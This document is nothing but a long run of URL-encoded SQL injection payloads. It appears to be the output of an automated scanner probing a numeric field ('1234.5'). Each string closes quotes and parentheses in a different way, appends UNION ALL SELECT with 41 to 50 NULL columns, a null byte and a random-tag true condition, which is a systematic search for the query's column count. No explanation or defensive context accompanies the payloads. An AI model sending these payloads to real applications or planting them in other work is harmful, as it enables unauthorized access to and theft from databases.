1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27mYRb%27%3D%27mYRb 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27wluS%27%3D%27wluS 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27WePn%27%3D%27WePn 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27zJWT%27%3D%27zJWT 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27aAae%27%3D%27aAae 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27yfuS%27%3D%27yfuS 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27YPMc%27%3D%27YPMc 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27uOLa%27%3D%27uOLa 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27oHmS%27%3D%27oHmS 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Odez%27%3D%27Odez 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27lKfw%27%3D%27lKfw 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27gKRM%27%20LIKE%20%27gKRM 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27TRAe%27%20LIKE%20%27TRAe 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27yULY%27%20LIKE%20%27yULY 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27bAHV%27%20LIKE%20%27bAHV 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27MwRD%27%20LIKE%20%27MwRD 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27KTXa%27%20LIKE%20%27KTXa 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27SaPW%27%20LIKE%20%27SaPW 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27ZAni%27%20LIKE%20%27ZAni 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27MVPs%27%20LIKE%20%27MVPs 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27vryR%27%20LIKE%20%27vryR 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27MvPB%27%20LIKE%20%27MvPB 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27tXoV%27%20LIKE%20%27tXoV 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27ffNh%27%20LIKE%20%27ffNh 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27aYYm%27%20LIKE%20%27aYYm 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27uJdM%27%20LIKE%20%27uJdM 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27hEAk%27%20LIKE%20%27hEAk 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27PNvK%27%20LIKE%20%27PNvK 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27liNW%27%20LIKE%20%27liNW 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27lEYC%27%20LIKE%20%27lEYC 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27rduM%27%20LIKE%20%27rduM 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27mVoD%27%20LIKE%20%27mVoD 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27mQua%27%20LIKE%20%27mQua 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27zCvw%27%20LIKE%20%27zCvw 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27roVW%27%20LIKE%20%27roVW 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27test%27%20LIKE%20%27test 